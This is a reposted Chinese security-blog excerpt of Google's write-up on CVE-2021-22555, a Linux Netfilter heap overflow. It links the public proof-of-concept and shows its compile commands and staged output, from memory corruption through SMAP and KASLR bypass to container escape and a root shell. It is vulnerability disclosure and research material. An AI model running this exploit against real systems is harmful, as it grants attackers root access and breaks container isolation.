CVE-2021-22555: Turning \x00\x00 into 10000$

  • A+
所属分类:安全文章

本文摘录于https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html



CVE-2021-22555是Linux Netfilter中一个已有15年历史的堆越界写入漏洞,它强大到可以绕过所有现代安全缓解措施,实现内核代码执行。它被用来打破kCTF集群的kubernetes pod隔离,并为慈善机构赢得了10000美元(谷歌将匹配并将捐赠翻倍至20000美元)

CVE-2021-22555: Turning \x00\x00 into 10000$

Proof-Of-Concept

The Proof-Of-Concept is available at https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555.

Executing it on a vulnerable machine will grant you root:

[email protected]:~$ gcc -m32 -static -o exploit exploit.c
[email protected]:~$ ./exploit
[+] Linux Privilege Escalation by [email protected] - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: ffc
[+] real_idx: fc4

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff91a49cb7f000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff91a49c7a0000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
[email protected]:/# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/#



本文始发于微信公众号(黑伞攻防实验室):CVE-2021-22555: Turning \x00\x00 into 10000$

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: